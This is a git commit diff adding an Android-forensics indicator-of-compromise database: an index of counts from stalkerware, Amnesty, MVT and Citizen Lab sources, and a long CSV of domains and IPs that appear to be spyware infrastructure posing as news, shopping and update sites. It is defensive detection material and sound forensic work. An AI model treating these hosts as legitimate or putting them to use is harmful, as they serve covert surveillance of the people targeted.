Add Android forensics, IOC threat-intel DB, Compose companion; scrub secrets from configs

This commit is contained in:
SsSnake
2026-07-13 15:45:47 -07:00
parent 925216290f
commit e48d577bd5
387 changed files with 211976 additions and 921 deletions

19
data/ioc/index.json Normal file
View File

@@ -0,0 +1,19 @@
{
"generated": "2026-07-13T15:40:17.978877",
"counts": {
"packages": 300,
"certs": 11,
"domains": 5793,
"ips": 65,
"file_paths": 19,
"processes": 84,
"hashes": 318
},
"sources": {
"stalkerware_ioc_yaml": true,
"amnesty_investigations": 16,
"mvt_campaigns": 8,
"citizen_lab_campaigns": 21,
"yara_rules": 52
}
}

View File

@@ -0,0 +1,605 @@
domain_name,ip_address
"14-tracking.com","191.101.31.25"
"1minto-start.com","185.94.190.203"
"24-7clinic.com","46.183.219.79"
"3driving.com","185.106.120.130"
"456h612i458g.com","81.22.255.180"
"7style.org","109.200.24.106"
"800health.net","185.189.112.199"
"access.dynamic-dns.net","95.183.51.199"
"accountnotify.com","185.130.184.35"
"activate-discount.com","200.7.97.228"
"actorsshop.net","31.184.198.149"
"actu24.online","185.156.175.219"
"addmyid.net","46.22.223.209"
"adeal4u.co","217.112.131.120"
"afriquenouvelle.com","185.94.191.69"
"aircraftsxhibition.com","108.170.31.100"
"ajelnews.net","109.200.24.72"
"akhbara-aalawsat.com","185.243.115.100"
"akhbar-aliqtisad.com","185.94.191.23"
"akhbar-arabia.com","200.7.97.216"
"albumphotopro.biz","185.45.192.134"
"alive2plunge.com","173.254.248.104"
"allafricaninfo.com","5.102.146.87"
"allbeautifularts.com","185.94.191.73"
"alldaycooking.co","217.112.131.103"
"allfadiha.co","217.64.113.254"
"allladiesloveme.com","38.132.118.108"
"all-sales.info","88.119.179.165"
"allthecolorsyoulike.com","185.225.68.6"
"allthegamesyouneed.com","185.195.200.43"
"allthemakeupyouneed.com","185.195.200.51"
"allthesongsyoulike.com","46.183.216.141"
"alluneed4home.net","109.200.24.48"
"android-core.org","109.200.24.112"
"android-updates.net","185.225.68.229"
"apiapple.com","185.141.26.50"
"apiwacdn.com","206.189.108.245"
"appointments-online.com","88.150.227.120"
"arabnews365.com","88.119.179.166"
"arab-share.com","46.21.147.141"
"arabworld.biz","46.21.147.224"
"arabworldnews.info","185.230.124.235"
"around-theglobe.co","185.82.202.32"
"ar-tweets.com","109.200.24.76"
"atlaslions.info","82.211.31.177"
"autodiscount.info","88.150.227.105"
"banca-movil.com","149.255.36.138"
"bargainservice.online","83.221.132.157"
"beautifulhousesaroundme.com","185.225.68.2"
"beethoventopsymphonies.com","80.255.12.246"
"benjamin-taganga.info","217.112.131.176"
"bestadventures4u.com","93.158.203.142"
"bestcandyever.com","5.149.250.2"
"bestfoods.co","200.7.98.133"
"bestfriendneedshelp.com","88.150.138.66"
"bestheadphones4u.com","93.158.203.140"
"besthotelsaroundme.com","5.149.252.157"
"bestperfumesnow.com","89.249.65.165"
"bestpresents4all.net","94.177.236.235"
"bestsalesaroundme.com","89.33.246.112"
"beststores4u.com","185.94.189.198"
"bestsushiever.com","88.150.138.106"
"better-deal.info","217.112.131.147"
"bicyclerentalnow.com","5.149.254.5"
"biggunsarefun.com","200.7.105.3"
"blackwhitebags.com","185.206.224.41"
"blcheck.utensils.pro","164.132.138.55"
"blue.911hig11carcay959454.com","54.37.104.101"
"booking-tables.com","109.200.24.59"
"boysrbabies.co","38.132.118.111"
"breakfastisgood.com","5.102.147.114"
"breaking-extranews.online","185.141.27.124"
"breakingnewsasia.com","200.7.111.156"
"breaking-news.co","88.150.189.108"
"breakthenews.net","81.95.5.165"
"br-hashtags.com","191.101.31.21"
"brighttooth.net","185.189.112.200"
"brownandblueeyes.com","185.29.11.165"
"browser-update.online","191.101.31.114"
"br-travels.com","81.95.7.58"
"buildurlife.net","5.149.255.198"
"bunchi.club","5.149.249.174"
"businesssupportme.com","5.149.255.69"
"bussybeesallover.com","195.12.48.42"
"buymanuel.co","185.117.75.84"
"buypresent4me.net","94.177.239.30"
"calendarsapp.com","185.117.72.120"
"captcha.bl33pon6373.com","88.99.107.18"
"carrefour-des-affaires.com","5.102.146.126"
"cars-to-buy.com","217.112.131.146"
"cashandlife.com","185.82.200.233"
"casia-news.info","185.198.58.158"
"catfoodstorage.net","217.61.5.131"
"catsndogsproducts.com","88.119.179.226"
"cdnupdateweb.com","190.97.165.115"
"cdnwa.com","185.141.25.30"
"cell-abonnes.com","5.102.147.82"
"cellphonesprices.com","93.158.200.205"
"cellular-updates.com","176.223.111.159"
"cellularupdates.info","185.77.129.136"
"cellular-updates.online","154.16.37.40"
"centrasia-news.com","185.225.68.125"
"cheapapartmentsaroundme.com","88.119.179.140"
"cheaphostingtoday.com","5.102.146.49"
"cheapmotelz.net","185.106.120.173"
"cheapsolutions4u.com","141.255.161.88"
"cheaptransporting.net","185.156.173.118"
"check-my-internetspeed.com","200.7.97.229"
"chocolateicecreamlovers.com","88.150.138.74"
"chocollife.me","185.94.191.123"
"chubaka.org","185.225.68.124"
"classic-furnitures.com","185.183.107.43"
"clickrighthere.online","138.59.17.76"
"coffecups.online","31.3.232.125"
"coffee2go.org","86.105.18.222"
"colorfulnotebooks.com","185.195.200.38"
"colorsoflife.online","62.113.232.221"
"columbus-parking.com","154.16.37.39"
"coolasiankitchen.com","5.102.146.91"
"coolbbqtools.net","217.112.131.108"
"coolmath4us.net","217.112.131.227"
"cool-smartphone-apps.com","217.112.131.58"
"coupedumondepro.com","188.215.229.213"
"couponshops.info","37.220.31.114"
"cpr-appointments.com","88.150.227.121"
"cryptocurrecny.com","185.225.68.77"
"cryptokoinz.com","5.149.254.24"
"cryptopcoinz.com","217.61.7.152"
"csomagodjott.com","200.7.97.238"
"daily-sport.news","200.7.97.214"
"dancinglife.co","89.249.65.206"
"deal4unow.com","185.134.29.146"
"delivery-24-7.com","81.92.202.222"
"dental-care-spa.net","185.225.68.202"
"deportesinfo.com","149.255.35.115"
"diaspora-news.com","81.95.5.144"
"dinneraroundyou.com","217.112.131.208"
"discountmarkets.info","88.150.138.69"
"discountstores.info","109.200.24.73"
"discoveredworld-news.com","185.236.202.184"
"dogfoodstorage.net","217.61.104.60"
"dogopics.com","5.102.145.183"
"doitformom.com","89.34.111.212"
"doitforthefame-now.com","88.150.138.82"
"do-itonyour-own.com","5.102.145.64"
"domain-redirect.com","109.200.24.122"
"domainsearching.net","185.117.89.251"
"domainsearching.net","80.211.250.229"
"domain-security.org","109.200.24.2"
"donateabox.co","5.102.146.82"
"donateaflower.com","104.216.8.34"
"done.events","130.185.250.200"
"dowhatyouneed.com","5.102.145.130"
"easybett.online","46.183.221.185"
"easy-pay.info","89.249.65.193"
"ecommerce-ads.org","46.183.223.249"
"economic-news.co","185.230.124.234"
"editorscolumn.net","89.238.138.141"
"egov-online.com","88.150.227.122"
"egov-segek.info","185.195.200.47"
"egov-sergek.info","185.195.200.47"
"ehistorybooks.com","185.109.168.29"
"ehistorybooks.com","78.142.25.30"
"elitecarz.net","5.102.147.163"
"eltiempo-news.com","38.84.132.165"
"emonitoring-paczki.pl","86.105.18.121"
"entertainmentinat.com","5.149.254.12"
"e-prokuror.info","5.102.145.72"
"e-sveiciens.com","5.149.254.14"
"eura-cell.com","88.150.227.98"
"eurasianupdate.com","88.150.227.110"
"eurosportnews.info","217.64.114.179"
"event-reg.info","185.77.131.10"
"ex-forexlive.com","5.102.147.73"
"extrahoney.net","77.245.76.109"
"ezdropshipping.net","23.107.197.107"
"fabric-shops.com","185.225.68.176"
"face-image.com","185.225.68.128"
"fadi7apress.com","5.102.145.26"
"fantastic-gardens.com","185.94.189.208"
"fashion-live.net","37.220.31.78"
"fashion-online.net","217.112.131.136"
"fashionpark.info","185.94.191.124"
"fastfixs.net","37.220.31.80"
"femmedaffaire.com","5.102.146.93"
"fiestamaghreb.com","188.215.229.216"
"files-downloads.com","217.61.96.219"
"findavoucher.online","185.198.58.196"
"findgoodfood.co","185.94.189.207"
"finditout-now.com","5.102.147.51"
"findmyass.org","8.39.147.100"
"findmyfriendsnow.com","179.43.169.41"
"findmylunch.org","38.132.118.116"
"findmymind.co","185.230.124.241"
"findmyplants.com","46.21.147.65"
"findouthere.org","83.221.132.104"
"fishingtrickz.com","185.244.150.68"
"fitness-for-ever.com","185.77.131.109"
"flights-report.com","217.112.131.42"
"flights-todays.com","88.150.227.103"
"flying-free.online","154.16.37.35"
"fofopiko.org","217.112.131.158"
"foodforyou.info","88.150.138.78"
"foodiez.online","46.183.221.187"
"foto-top.info","185.225.68.133"
"foudefoot.live","185.45.193.210"
"freedominfo.net","46.21.147.123"
"freelancers-team.org","5.102.147.106"
"free-local-events.info","185.225.68.207"
"freshandsoftbread.com","188.215.229.222"
"freshsaladtoday.com","200.7.97.254"
"fundum8430.com","163.172.140.159"
"funinat.com","46.21.147.46"
"funinthesun4u.com","185.198.58.144"
"funintheuk.com","185.117.75.228"
"funnytvclips.com","200.7.111.155"
"fwupdating.com","5.135.199.22"
"gadgetsshop.info","185.225.68.158"
"getagift.info","185.225.68.159"
"getoutofyourmind.com","5.149.254.18"
"getphotosinstant.net","5.102.147.51"
"glassesofwine.com","38.132.118.117"
"globalsupporteam.com","80.255.6.24"
"golf-news.live","167.88.5.222"
"goodcookingonline.com","5.102.146.90"
"goodflowersinside.com","37.220.31.19"
"good-games.org","80.255.3.111"
"goodthoughts4u.com","5.102.147.254"
"goroskop.co","5.149.255.19"
"gostatspro.com","81.17.30.45"
"go-trip.online","200.7.111.11"
"gulfca.net","88.150.227.115"
"gulf-financials.com","82.211.30.122"
"gulf-news.info","185.230.124.233"
"hairdresseraroundme.com","31.3.232.116"
"halal-place.com","89.249.65.234"
"handcreamforyou.com","185.81.113.105"
"handymanwood.com","77.73.65.47"
"happiness4us.com","5.149.254.20"
"hdsoccerstream.com","195.12.50.179"
"health-club.online","86.105.18.212"
"hellomydaddy.com","200.7.97.168"
"hellomymommy.com","200.7.97.167"
"highclassdining.net","109.200.24.58"
"holiday4u.work","5.102.146.184"
"homeishere.co","31.3.232.126"
"homemadecandies.net","195.12.50.177"
"host-one-more.com","185.156.173.70"
"hotelsauto.co","185.198.57.144"
"hotels-review.org","217.112.131.90"
"hotelstax.co","188.215.229.205"
"hotelsurvey.info","185.225.68.205"
"hothdwallpaperz.com","5.102.145.37"
"hotinfosource.com","217.112.131.111"
"hot-motors.com","185.117.89.231"
"housesfurniture.com","185.94.192.106"
"housing-update.com","88.150.227.117"
"howisurday.com","185.198.58.195"
"howtoexplorebirds.com","88.150.227.99"
"howtomakeavocadotoastandegg.com","84.38.129.195"
"hracingtips.com","185.117.89.220"
"icecreamlovesme.com","155.94.160.126"
"igiheonline.com","5.102.147.250"
"ilovemybeatifulnails.com","109.200.24.10"
"ilovemymilf.com","5.102.146.72"
"income-tax.online","103.199.16.153"
"indrive.info","185.225.68.141"
"ineediscounts.com","185.117.72.113"
"info24.live","185.141.27.116"
"infospotpro.com","217.112.131.20"
"infospress.com","5.102.146.241"
"insta-foto.net","185.141.26.39"
"internetmobilespeed.com","91.219.238.77"
"intim-media.net","185.225.68.126"
"investigationews.com","185.82.200.187"
"in-weather.com","103.199.17.206"
"islamic-news-today.com","103.199.16.88"
"islamiyaat.com","89.249.65.146"
"islam-today.info","185.198.58.151"
"islam-world.net","200.7.97.242"
"istgr-foto.com","185.225.68.131"
"iwantitallnow.com","173.254.248.105"
"jaimelire.net","185.183.97.196"
"just-one-left.com","46.21.147.14"
"karbalaeyat.com","191.101.31.29"
"kaspi-payment.com","185.94.191.114"
"keyindoors.com","66.85.157.84"
"kingdom-deals.com","200.7.97.212"
"kingdom-news.com","191.101.31.118"
"klientuserviss.com","185.198.58.178"
"koramaghreb.com","188.215.229.214"
"kurjerserviss.com","185.198.58.177"
"labonneforme.net","185.183.97.194"
"leadersnews.org","5.102.147.105"
"leggingsjustforyou.com","5.149.250.18"
"legyelvodas.com","185.117.89.252"
"legyelvodas.com","80.211.254.70"
"legyelvodas.net","185.117.89.253"
"leleader.org","185.106.120.35"
"leprotestant.com","185.106.120.34"
"lesbonnesaffaires.online","5.102.146.123"
"lesportail.biz","185.117.75.165"
"liam-ryan.co","185.141.26.49"
"lifedonor.net","88.150.138.111"
"like-the-rest.com","185.225.68.68"
"live-once.net","185.183.97.117"
"loading-images.com","5.102.147.172"
"loading-pag.net","8.28.175.73"
"localgreenflowers.com","185.225.68.198"
"loisiragogo.com","5.102.146.128"
"lonely-place.com","5.102.146.116"
"looking-for-two.com","5.102.145.8"
"lookitupnow.website","185.81.113.81"
"look-outsidenow.com","89.33.246.113"
"loschismescalientes.com","149.255.35.106"
"losnegocios.biz","23.227.207.174"
"lost-n-found.net","185.183.96.140"
"loveandhatenow.com","5.102.147.219"
"maghrebfoot.com","185.117.75.169"
"maghrebfunny.biz","185.94.189.214"
"mamba-live.com","217.112.131.106"
"mapupdatezone.com","185.193.38.159"
"massagetax.co","5.102.145.98"
"maymknch2026.co","188.215.229.212"
"medical-updates.com","185.77.129.103"
"megacenter.info","217.112.131.95"
"mercedesbenz-vip.com","185.77.131.103"
"mideast-today.com","88.119.179.176"
"miles-club.com","217.112.131.91"
"miralo-rapidamente.com","46.21.150.144"
"mobile-softs.com","5.149.255.18"
"mobile-update.online","185.198.57.43"
"mobile-updates.info","217.112.131.61"
"mobileweatherweb.com","185.44.105.35"
"mobi-up.net","81.92.202.215"
"moh-followup.com","88.150.227.118"
"moh-online.com","109.200.24.71"
"mondaymornings.co","176.223.111.231"
"moneycoincurrency.com","185.225.68.201"
"moneydigitalcurrency.com","185.225.68.200"
"moneyxchanges.com","109.200.24.19"
"mosque-salah.com","109.200.24.64"
"mosque-salah.net","185.225.68.5"
"mosquesfinder.com","194.187.249.106"
"motordeal.info","88.150.227.104"
"movie-tickets.online","103.199.16.11"
"moyfoto.net","185.141.26.18"
"m-resume.com","185.225.68.135"
"muftyat.com","217.112.131.16"
"muslim-world.info","200.7.97.215"
"muzicclips.com","200.7.97.248"
"mybrightidea.co","185.117.72.10"
"mydailycooking.net","89.249.65.138"
"myfiles.photos","130.185.250.199"
"myfreecharge.online","103.199.16.111"
"mygreathat.com","109.200.24.126"
"mykaspi.com","217.112.131.39"
"mylovelypet.net","62.113.232.197"
"mymobile-cell.com","217.61.4.34"
"mypostservice.online","192.52.243.110"
"my-privacy.co","103.199.16.15"
"mysadaga.com","31.3.232.108"
"myshoesforever.com","185.225.68.177"
"myshop4u.net","77.73.65.210"
"mystulchik.com","5.102.145.14"
"mysuperheadphones.co","179.43.169.8"
"mysuperheadphones.co","52.54.37.95"
"myukadventures.com","185.94.189.204"
"nation24.info","5.102.147.235"
"nationalleagues.net","5.102.146.124"
"nbrowser.org","109.200.24.102"
"newandfresh.com","185.82.202.29"
"newandroidapps.net","185.181.10.64"
"newarrivals.club","185.109.168.12"
"newarrivals.club","88.119.179.102"
"newcooking.org","109.200.24.11"
"newdailycoupons.com","88.150.227.77"
"newmodel.online","185.109.168.18"
"newmodel.online","88.119.179.168"
"newnhotapps.com","217.112.131.137"
"news-alert.org","200.7.111.124"
"newscurrent.info","185.134.29.144"
"newsdirect.online","185.243.112.77"
"news-gazette.info","88.119.179.164"
"newsofficial.info","87.121.98.39"
"newsofgames.com","154.16.37.11"
"newsofthemoment.net","38.132.118.114"
"newworld-news.com","89.40.181.124"
"nightevents.info","185.225.68.206"
"noextramoney.com","192.161.48.122"
"noloveforyou.com","38.132.114.168"
"nomorewarnow.com","185.198.58.143"
"noonstore.sale","130.185.250.201"
"noor-alhedaya.com","89.249.65.149"
"normal-brain.com","103.199.16.12"
"nosalternatives.com","185.141.27.123"
"nothernkivu.com","89.40.181.125"
"noti-global.com","38.84.132.168"
"noti-hot.com","8.28.175.78"
"notresante-infos.com","5.102.145.169"
"nouveau-president.com","185.106.120.246"
"nouvelles247.com","200.7.97.213"
"novosti247.com","109.200.24.32"
"nuevaidea.co","173.254.248.115"
"odnoklass-profile.com","185.225.68.132"
"offresimmobilier.com","5.102.145.12"
"ok-group.org","185.225.68.134"
"one-isnot-enough.com","5.102.147.13"
"onetreeinheaven.com","37.220.31.107"
"online-dailynews.com","88.150.227.125"
"onlinefreework.com","200.7.105.39"
"onlineshopzm.com","185.225.68.60"
"onlygossip.info","185.117.89.198"
"only-news.net","5.102.147.162"
"onlytoday.biz","109.200.24.104"
"onthegoodtime.com","185.225.68.69"
"operatingnews.com","46.21.147.173"
"orange-updates.com","5.104.105.200"
"ourorder.info","185.225.68.127"
"outletsaroundme.com","78.142.25.37"
"outletstore.tech","87.121.98.38"
"papers2go.co","176.223.111.206"
"park4free.info","185.144.83.116"
"passwd.privo7799add.net","188.40.155.240"
"pastesbin.com","185.195.200.56"
"pathtogo.net","5.149.255.3"
"pay-city.com","154.16.37.105"
"paynfly.info","185.144.83.114"
"paywithcrytpo.com","200.7.111.154"
"phonering4you.com","5.149.250.19"
"photo-my.net","5.149.255.16"
"pickcard.info","5.102.147.138"
"picture4us.com","46.183.221.149"
"pi.license-updater.com","91.219.28.21"
"pine-sales.com","92.222.208.251"
"pizzatoyourplace.com","5.149.249.19"
"playwithusonline.com","200.7.111.102"
"pochta-info.com","185.29.11.203"
"politica504.com","149.255.36.132"
"politicalpress.org","5.102.145.99"
"politiques-infos.info","5.102.145.17"
"postainf.net","200.7.98.117"
"posta.news","185.29.11.200"
"ppcisdead.com","88.150.189.121"
"prikol-girls.com","5.149.249.189"
"promosdereve.com","88.119.179.105"
"promotionlove.co","185.117.75.165"
"promotionlove.co","185.94.192.101"
"puffyteddybear.com","84.38.130.107"
"purple-enveloppe.com","66.85.157.71"
"quitmyjob.xyz","103.199.16.47"
"quran-quote.com","84.200.32.211"
"rainingcats.net","38.132.118.110"
"readingbooksnow.com","109.200.24.7"
"regionews.net","5.102.145.90"
"reklamas.info","5.149.254.2"
"rentmotors.net","88.150.138.99"
"research-archive.com","5.102.146.59"
"reseausocialsolutions.co","185.82.200.143"
"reservationszone.com","88.150.138.85"
"reseufun.com","188.215.229.215"
"resolutionsbox.com","38.132.118.107"
"restaurantsstar.com","185.225.68.75"
"rewards-club.info","176.223.111.137"
"rockmusic4u.com","185.82.200.164"
"rockstarpony.com","94.177.234.8"
"rosegoldjewerly.com","185.195.200.44"
"rosesforus.com","88.150.189.111"
"russian4u.net","95.213.193.40"
"saladsaroundme.com","89.33.246.119"
"same-old.net","37.220.31.46"
"savemoretime.co","185.225.68.64"
"saveurday.net","37.72.175.179"
"securesmsing.com","109.200.24.14"
"sergek.info","185.195.200.46"
"services-sync.com","46.21.147.237"
"service-update.online","185.94.191.59"
"shia-voice.com","52.54.37.95"
"shia-voice.com","89.249.65.148"
"shoppingdailydeals.net","109.200.24.18"
"shortfb.com","37.220.31.108"
"shuturl.com","185.117.72.117"
"signpetition.co","200.7.111.125"
"site-redirecting.com","109.200.24.20"
"smarttarfi.com","45.76.42.111"
"snoweverywhere.com","46.21.147.21"
"soccerstreamingstars.com","185.183.96.131"
"social-life.info","185.183.96.131"
"somuchrain.com","5.102.145.39"
"so-this-is.com","159.89.193.231"
"specialgifts4all.com","200.7.97.225"
"sportupdates.info","185.225.68.86"
"sportupdates.online","89.33.246.118"
"sputnik-news.info","185.198.58.182"
"starbuckscoffeeweb.com","217.112.131.109"
"stars4sale.co","185.225.68.65"
"start2playnow.com","5.102.145.248"
"starting-from0.com","185.94.189.219"
"statisticsdb.net","185.93.183.231"
"stopmysms.com","191.101.31.222"
"stopsms.biz","185.198.58.154"
"sunday-deals.com","88.119.179.169"
"supportonline4me.com","185.80.53.199"
"surprising-sites.com","217.112.131.67"
"sync-cdn.com","185.183.96.150"
"syncmap.org","185.117.89.145"
"tablereservation.info","109.200.24.66"
"takethat.co","209.250.247.96"
"tastyteaflavors.com","5.149.248.27"
"telecom-info.com","185.225.68.61"
"tengrinews.co","81.95.5.168"
"theastafrican.com","185.156.173.104"
"thebestclassicalmusic.net","217.64.113.250"
"thecoffeeilove.com","185.225.68.199"
"thehighesttemple.com","185.183.107.49"
"thehoteloffers.com","185.225.68.203"
"the-only-way-out.com","185.230.124.228"
"theshopclub.org","185.225.68.160"
"thespaclub.net","88.150.138.83"
"theway2get.com","88.119.179.156"
"ticket-aviata.info","185.94.191.14"
"tiketon.info","185.94.191.120"
"tlgr-me.org","185.225.68.130"
"tobepure.com","88.119.179.205"
"tommyfame.com","77.245.76.110"
"top100vidz.com","62.113.232.207"
"top10gifts4men.com","5.102.145.180"
"top10leadsgen.com","200.7.97.230"
"topbraingames4u.com","185.183.96.169"
"topten-news.info","185.94.191.67"
"touristvaca.com","185.198.57.200"
"tradeexchanging.com","81.95.5.164"
"traffic-pay.com","88.150.227.119"
"traffic-updates.info","217.112.131.156"
"travel-foryou.online","5.102.145.113"
"travelight.online","81.95.5.147"
"traveltogether.link","5.102.147.114"
"tricksinswiss.com","89.238.138.136"
"trililihihi.com","5.102.145.14"
"t-support.net","109.200.24.15"
"turismo-aqui.com","38.84.132.172"
"tvshowcusting.com","31.184.198.150"
"un-limitededitions.com","185.225.68.97"
"unsubscribed.co","191.101.31.213"
"untoldinfo.net","5.102.147.41"
"updateapps.net","80.255.3.107"
"upgrade-sim-card.com","217.112.131.150"
"upload-now.net","88.150.227.116"
"uptownfun.co","46.246.1.12"
"urbestfriends.com","77.73.65.199"
"url-redirect.com","66.172.10.189"
"urlsync.com","185.141.25.210"
"urspanishteacher.net","95.213.188.35"
"vanillaandcream.com","77.245.76.113"
"vastdealsnow.com","191.101.31.214"
"verify-app.online","185.82.202.42"
"videosdownload.co","5.102.146.66"
"vider-image.com","185.225.68.123"
"viedechretien.org","5.102.145.122"
"vie-en-islam.com","5.102.147.234"
"viewhdvideos.com","200.7.111.118"
"vipmasajes.com","38.84.132.174"
"viva-droid.com","5.102.146.64"
"vivrechezsoi.info","5.102.147.236"
"vkan-profile.com","185.225.68.129"
"volcanosregion.com","5.102.146.85"
"waffleswithnutella.com","66.85.157.83"
"watersport4u.net","77.73.68.160"
"weather4free.com","88.119.179.134"
"weatherapi.co","206.189.51.151"
"web-config.org","109.200.24.121"
"websites4yourhost.com","185.234.73.10"
"web-viewer.online","217.112.131.189"
"welovebigcakes.com","185.117.75.82"
"welovelollipops.com","185.45.192.144"
"welovemorningcoffees.com","179.43.169.36"
"wewantflowersnow.com","185.225.68.3"
"whatcanidowithbirds.com","88.150.189.106"
"whats-new.org","46.22.223.252"
"whereismybonus.com","5.149.252.241"
"whereismyhand.com","38.132.114.167"
"whereisthehat.com","8.28.175.71"
"windyone.net","200.7.105.24"
"wintertimes.co","46.246.1.14"
"wonderfulinsights.com","217.112.131.207"
"woodhome4u.com","77.73.65.48"
"xchange4u.net","185.183.107.44"
"xchangerates247.net","185.183.96.139"
"xn--nissn-3jc.com","89.238.132.249"
"xn--noki-t5b.com","86.105.18.11"
"xn--telegrm-qbd.com","185.225.68.136"
"xtremelivesupport.com","5.102.146.237"
"youcantpass.com","37.220.31.28"
"yourbestclothes.com","46.21.147.197"
"yourbestefforts.com","46.21.147.196"
"yourbestvaca.com","104.216.8.38"
"yourgreatestsmartphone.com","88.150.227.83"
"yourhotelreservation.info","185.225.68.204"
"yummyfoodallover.com","37.72.175.143"
"zednewszm.com","217.64.113.251"
"zm-banks.com","217.64.113.252"
"zm-banks.com","89.43.60.103"
"zm-weather.com","89.43.60.103"
"zsports-info.com","89.43.60.104"
1 domain_name ip_address
2 14-tracking.com 191.101.31.25
3 1minto-start.com 185.94.190.203
4 24-7clinic.com 46.183.219.79
5 3driving.com 185.106.120.130
6 456h612i458g.com 81.22.255.180
7 7style.org 109.200.24.106
8 800health.net 185.189.112.199
9 access.dynamic-dns.net 95.183.51.199
10 accountnotify.com 185.130.184.35
11 activate-discount.com 200.7.97.228
12 actorsshop.net 31.184.198.149
13 actu24.online 185.156.175.219
14 addmyid.net 46.22.223.209
15 adeal4u.co 217.112.131.120
16 afriquenouvelle.com 185.94.191.69
17 aircraftsxhibition.com 108.170.31.100
18 ajelnews.net 109.200.24.72
19 akhbara-aalawsat.com 185.243.115.100
20 akhbar-aliqtisad.com 185.94.191.23
21 akhbar-arabia.com 200.7.97.216
22 albumphotopro.biz 185.45.192.134
23 alive2plunge.com 173.254.248.104
24 allafricaninfo.com 5.102.146.87
25 allbeautifularts.com 185.94.191.73
26 alldaycooking.co 217.112.131.103
27 allfadiha.co 217.64.113.254
28 allladiesloveme.com 38.132.118.108
29 all-sales.info 88.119.179.165
30 allthecolorsyoulike.com 185.225.68.6
31 allthegamesyouneed.com 185.195.200.43
32 allthemakeupyouneed.com 185.195.200.51
33 allthesongsyoulike.com 46.183.216.141
34 alluneed4home.net 109.200.24.48
35 android-core.org 109.200.24.112
36 android-updates.net 185.225.68.229
37 apiapple.com 185.141.26.50
38 apiwacdn.com 206.189.108.245
39 appointments-online.com 88.150.227.120
40 arabnews365.com 88.119.179.166
41 arab-share.com 46.21.147.141
42 arabworld.biz 46.21.147.224
43 arabworldnews.info 185.230.124.235
44 around-theglobe.co 185.82.202.32
45 ar-tweets.com 109.200.24.76
46 atlaslions.info 82.211.31.177
47 autodiscount.info 88.150.227.105
48 banca-movil.com 149.255.36.138
49 bargainservice.online 83.221.132.157
50 beautifulhousesaroundme.com 185.225.68.2
51 beethoventopsymphonies.com 80.255.12.246
52 benjamin-taganga.info 217.112.131.176
53 bestadventures4u.com 93.158.203.142
54 bestcandyever.com 5.149.250.2
55 bestfoods.co 200.7.98.133
56 bestfriendneedshelp.com 88.150.138.66
57 bestheadphones4u.com 93.158.203.140
58 besthotelsaroundme.com 5.149.252.157
59 bestperfumesnow.com 89.249.65.165
60 bestpresents4all.net 94.177.236.235
61 bestsalesaroundme.com 89.33.246.112
62 beststores4u.com 185.94.189.198
63 bestsushiever.com 88.150.138.106
64 better-deal.info 217.112.131.147
65 bicyclerentalnow.com 5.149.254.5
66 biggunsarefun.com 200.7.105.3
67 blackwhitebags.com 185.206.224.41
68 blcheck.utensils.pro 164.132.138.55
69 blue.911hig11carcay959454.com 54.37.104.101
70 booking-tables.com 109.200.24.59
71 boysrbabies.co 38.132.118.111
72 breakfastisgood.com 5.102.147.114
73 breaking-extranews.online 185.141.27.124
74 breakingnewsasia.com 200.7.111.156
75 breaking-news.co 88.150.189.108
76 breakthenews.net 81.95.5.165
77 br-hashtags.com 191.101.31.21
78 brighttooth.net 185.189.112.200
79 brownandblueeyes.com 185.29.11.165
80 browser-update.online 191.101.31.114
81 br-travels.com 81.95.7.58
82 buildurlife.net 5.149.255.198
83 bunchi.club 5.149.249.174
84 businesssupportme.com 5.149.255.69
85 bussybeesallover.com 195.12.48.42
86 buymanuel.co 185.117.75.84
87 buypresent4me.net 94.177.239.30
88 calendarsapp.com 185.117.72.120
89 captcha.bl33pon6373.com 88.99.107.18
90 carrefour-des-affaires.com 5.102.146.126
91 cars-to-buy.com 217.112.131.146
92 cashandlife.com 185.82.200.233
93 casia-news.info 185.198.58.158
94 catfoodstorage.net 217.61.5.131
95 catsndogsproducts.com 88.119.179.226
96 cdnupdateweb.com 190.97.165.115
97 cdnwa.com 185.141.25.30
98 cell-abonnes.com 5.102.147.82
99 cellphonesprices.com 93.158.200.205
100 cellular-updates.com 176.223.111.159
101 cellularupdates.info 185.77.129.136
102 cellular-updates.online 154.16.37.40
103 centrasia-news.com 185.225.68.125
104 cheapapartmentsaroundme.com 88.119.179.140
105 cheaphostingtoday.com 5.102.146.49
106 cheapmotelz.net 185.106.120.173
107 cheapsolutions4u.com 141.255.161.88
108 cheaptransporting.net 185.156.173.118
109 check-my-internetspeed.com 200.7.97.229
110 chocolateicecreamlovers.com 88.150.138.74
111 chocollife.me 185.94.191.123
112 chubaka.org 185.225.68.124
113 classic-furnitures.com 185.183.107.43
114 clickrighthere.online 138.59.17.76
115 coffecups.online 31.3.232.125
116 coffee2go.org 86.105.18.222
117 colorfulnotebooks.com 185.195.200.38
118 colorsoflife.online 62.113.232.221
119 columbus-parking.com 154.16.37.39
120 coolasiankitchen.com 5.102.146.91
121 coolbbqtools.net 217.112.131.108
122 coolmath4us.net 217.112.131.227
123 cool-smartphone-apps.com 217.112.131.58
124 coupedumondepro.com 188.215.229.213
125 couponshops.info 37.220.31.114
126 cpr-appointments.com 88.150.227.121
127 cryptocurrecny.com 185.225.68.77
128 cryptokoinz.com 5.149.254.24
129 cryptopcoinz.com 217.61.7.152
130 csomagodjott.com 200.7.97.238
131 daily-sport.news 200.7.97.214
132 dancinglife.co 89.249.65.206
133 deal4unow.com 185.134.29.146
134 delivery-24-7.com 81.92.202.222
135 dental-care-spa.net 185.225.68.202
136 deportesinfo.com 149.255.35.115
137 diaspora-news.com 81.95.5.144
138 dinneraroundyou.com 217.112.131.208
139 discountmarkets.info 88.150.138.69
140 discountstores.info 109.200.24.73
141 discoveredworld-news.com 185.236.202.184
142 dogfoodstorage.net 217.61.104.60
143 dogopics.com 5.102.145.183
144 doitformom.com 89.34.111.212
145 doitforthefame-now.com 88.150.138.82
146 do-itonyour-own.com 5.102.145.64
147 domain-redirect.com 109.200.24.122
148 domainsearching.net 185.117.89.251
149 domainsearching.net 80.211.250.229
150 domain-security.org 109.200.24.2
151 donateabox.co 5.102.146.82
152 donateaflower.com 104.216.8.34
153 done.events 130.185.250.200
154 dowhatyouneed.com 5.102.145.130
155 easybett.online 46.183.221.185
156 easy-pay.info 89.249.65.193
157 ecommerce-ads.org 46.183.223.249
158 economic-news.co 185.230.124.234
159 editorscolumn.net 89.238.138.141
160 egov-online.com 88.150.227.122
161 egov-segek.info 185.195.200.47
162 egov-sergek.info 185.195.200.47
163 ehistorybooks.com 185.109.168.29
164 ehistorybooks.com 78.142.25.30
165 elitecarz.net 5.102.147.163
166 eltiempo-news.com 38.84.132.165
167 emonitoring-paczki.pl 86.105.18.121
